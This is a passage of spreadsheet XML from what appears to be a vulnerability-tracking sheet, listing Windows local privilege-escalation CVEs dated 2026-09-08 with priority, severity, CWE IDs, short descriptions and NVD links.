      <c r="G3415" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3415" s="5" t="inlineStr"/>
      <c r="I3415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3415" s="5" t="inlineStr"/>
      <c r="K3415" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3415" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t>
        </is>
      </c>
    </row>
    <row r="3416">
      <c r="A3416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69466</t>
        </is>
      </c>
      <c r="C3416" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3416" s="5" t="inlineStr"/>
      <c r="F3416" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3416" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3416" s="5" t="inlineStr"/>
      <c r="I3416" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3416" s="5" t="inlineStr"/>
      <c r="K3416" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3416" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t>
        </is>
      </c>
    </row>
    <row r="3417">
      <c r="A3417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69468</t>
        </is>
      </c>
      <c r="C3417" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3417" s="5" t="inlineStr"/>
      <c r="F3417" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3417" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3417" s="5" t="inlineStr"/>
      <c r="I3417" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3417" s="5" t="inlineStr"/>
      <c r="K3417" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3417" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t>
        </is>
      </c>
    </row>
    <row r="3418">
      <c r="A3418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69470</t>
        </is>
      </c>
      <c r="C3418" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3418" s="5" t="inlineStr"/>
      <c r="F3418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3418" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3418" s="5" t="inlineStr"/>
      <c r="I3418" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3418" s="5" t="inlineStr"/>
      <c r="K3418" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3418" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t>
        </is>
      </c>
    </row>
    <row r="3419">
      <c r="A3419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69472</t>
        </is>
      </c>
      <c r="C3419" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3419" s="5" t="inlineStr"/>
      <c r="F3419" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3419" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3419" s="5" t="inlineStr"/>
      <c r="I3419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3419" s="5" t="inlineStr"/>
      <c r="K3419" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3419" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t>
        </is>
      </c>
    </row>
    <row r="3420">
      <c r="A3420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69473</t>
        </is>
      </c>
      <c r="C3420" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3420" s="5" t="inlineStr"/>
      <c r="F3420" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3420" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3420" s="5" t="inlineStr"/>
      <c r="I3420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3420" s="5" t="inlineStr"/>
      <c r="K3420" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3420" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t>
        </is>
      </c>
    </row>
    <row r="3421">
      <c r="A3421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69488</t>
        </is>
      </c>
      <c r="C3421" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3421" s="5" t="inlineStr"/>
      <c r="F3421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3421" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3421" s="5" t="inlineStr"/>
      <c r="I3421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3421" s="5" t="inlineStr"/>
      <c r="K3421" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3421" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t>
        </is>
      </c>
    </row>
    <row r="3422">
      <c r="A3422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69492</t>
        </is>
      </c>
      <c r="C3422" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3422" s="5" t="inlineStr"/>
      <c r="F3422" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3422" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3422" s="5" t="inlineStr"/>
      <c r="I3422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3422" s="5" t="inlineStr"/>
      <c r="K3422" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3422" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t>
        </is>
      </c>
    </row>
    <row r="3423">
      <c r="A3423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69498</t>
        </is>
      </c>
      <c r="C3423" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3423" s="5" t="inlineStr"/>
      <c r="F3423" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3423" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3423" s="5" t="inlineStr"/>
      <c r="I3423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3423" s="5" t="inlineStr"/>
      <c r="K3423" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3423" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t>
        </is>
      </c>
    </row>
    <row r="3424">
      <c r="A3424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69500</t>
        </is>
      </c>
      <c r="C3424" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3424" s="5" t="inlineStr"/>
      <c r="F3424" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3424" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3424" s="5" t="inlineStr"/>
      <c r="I3424" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3424" s="5" t="inlineStr"/>
      <c r="K3424" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3424" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t>
        </is>
      </c>
    </row>
    <row r="3425">
      <c r="A3425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69501</t>
        </is>
      </c>
      <c r="C3425" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3425" s="5" t="inlineStr"/>
      <c r="F3425" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3425" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3425" s="5" t="inlineStr"/>
      <c r="I3425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3425" s="5" t="inlineStr"/>
      <c r="K3425" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L3425" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t>
        </is>
      </c>
    </row>
    <row r="3426">
      <c r="A3426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69516</t>
        </is>
      </c>
      <c r="C3426" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3426" s="5" t="inlineStr"/>
      <c r="F3426" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3426" s="5" t="inlineStr"/>
      <c r="H3426" s="5" t="inlineStr"/>
      <c r="I3426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3426" s="5" t="inlineStr"/>
      <c r="K3426" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3426" s="5" t="inlineStr">
        <is>
          <t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t>
        </is>
      </c>
    </row>
    <row r="3427">
      <c r="A3427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69517</t>
        </is>
      </c>
      <c r="C3427" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3427" s="5" t="inlineStr"/>
      <c r="F3427" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3427" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3427" s="5" t="inlineStr"/>
      <c r="I3427" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3427" s="5" t="inlineStr"/>
      <c r="K3427" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3427" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t>
        </is>
      </c>
    </row>
    <row r="3428">
      <c r="A3428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69540</t>
        </is>
      </c>
      <c r="C3428" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3428" s="5" t="inlineStr"/>
      <c r="F3428" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3428" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3428" s="5" t="inlineStr"/>
      <c r="I3428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3428" s="5" t="inlineStr"/>
      <c r="K3428" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3428" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t>
        </is>
      </c>
    </row>
    <row r="3429">
      <c r="A3429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69549</t>
        </is>
      </c>
      <c r="C3429" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3429" s="5" t="inlineStr"/>
      <c r="F3429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3429" s="5" t="inlineStr"/>
      <c r="H3429" s="5" t="inlineStr"/>
      <c r="I3429" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3429" s="5" t="inlineStr"/>
      <c r="K3429" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="L3429" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t>
        </is>
      </c>
    </row>
    <row r="3430">
      <c r="A3430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69560</t>
        </is>
      </c>
      <c r="C3430" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3430" s="5" t="inlineStr"/>
      <c r="F3430" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3430" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3430" s="5" t="inlineStr"/>
      <c r="I3430" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3430" s="5" t="inlineStr"/>
      <c r="K3430" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3430" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t>
        </is>
      </c>
    </row>
    <row r="3431">
      <c r="A3431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69563</t>
        </is>
      </c>
      <c r="C3431" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3431" s="5" t="inlineStr"/>
      <c r="F3431" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3431" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3431" s="5" t="inlineStr"/>
      <c r="I3431" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3431" s="5" t="inlineStr"/>
      <c r="K3431" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-367</t>
        </is>
      </c>
      <c r="L3431" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t>
        </is>
      </c>
    </row>
    <row r="3432">
      <c r="A3432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69564</t>
        </is>
      </c>
      <c r="C3432" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3432" s="5" t="inlineStr"/>
      <c r="F3432" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3432" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3432" s="5" t="inlineStr"/>
      <c r="I3432" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3432" s="5" t="inlineStr"/>
      <c r="K3432" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3432" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t>
        </is>
      </c>
    </row>
    <row r="3433">
      <c r="A3433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69567</t>
        </is>
      </c>
      <c r="C3433" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3433" s="5" t="inlineStr"/>
      <c r="F3433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3433" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3433" s="5" t="inlineStr"/>
      <c r="I3433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3433" s="5" t="inlineStr"/>
      <c r="K3433" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3433" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t>
        </is>
      </c>
    </row>
    <row r="3434">
      <c r="A3434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69573</t>
        </is>
      </c>
      <c r="C3434" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3434" s="5" t="inlineStr"/>
      <c r="F3434" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3434" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3434" s="5" t="inlineStr"/>
      <c r="I3434" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3434" s="5" t="inlineStr"/>
      <c r="K3434" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3434" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t>
        </is>
      </c>
    </row>
    <row r="3435">
      <c r="A3435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69574</t>
        </is>
      </c>
      <c r="C3435" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3435" s="5" t="inlineStr"/>
      <c r="F3435" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3435" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3435" s="5" t="inlineStr"/>
      <c r="I3435" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3435" s="5" t="inlineStr"/>
      <c r="K3435" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3435" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t>
        </is>
      </c>
    </row>
    <row r="3436">
      <c r="A3436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69575</t>
        </is>
      </c>
      <c r="C3436" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3436" s="5" t="inlineStr"/>
      <c r="F3436" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3436" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3436" s="5" t="inlineStr"/>
      <c r="I3436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3436" s="5" t="inlineStr"/>
      <c r="K3436" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3436" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t>
        </is>
      </c>
    </row>
    <row r="3437">
      <c r="A3437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69578</t>
        </is>
      </c>
      <c r="C3437" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3437" s="5" t="inlineStr"/>
      <c r="F3437" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3437" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3437" s="5" t="inlineStr"/>
      <c r="I3437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3437" s="5" t="inlineStr"/>
      <c r="K3437" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L3437" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t>
        </is>
      </c>
    </row>
    <row r="3438">
      <c r="A3438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69581</t>
        </is>
      </c>
      <c r="C3438" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3438" s="5" t="inlineStr"/>
      <c r="F3438" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3438" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3438" s="5" t="inlineStr"/>
      <c r="I3438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3438" s="5" t="inlineStr"/>
      <c r="K3438" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3438" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t>
        </is>
      </c>
    </row>
    <row r="3439">
      <c r="A3439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69600</t>
        </is>
      </c>
      <c r="C3439" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3439" s="5" t="inlineStr"/>
      <c r="F3439" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3439" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3439" s="5" t="inlineStr"/>
      <c r="I3439" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3439" s="5" t="inlineStr"/>
      <c r="K3439" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3439" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t>
        </is>
      </c>
    </row>
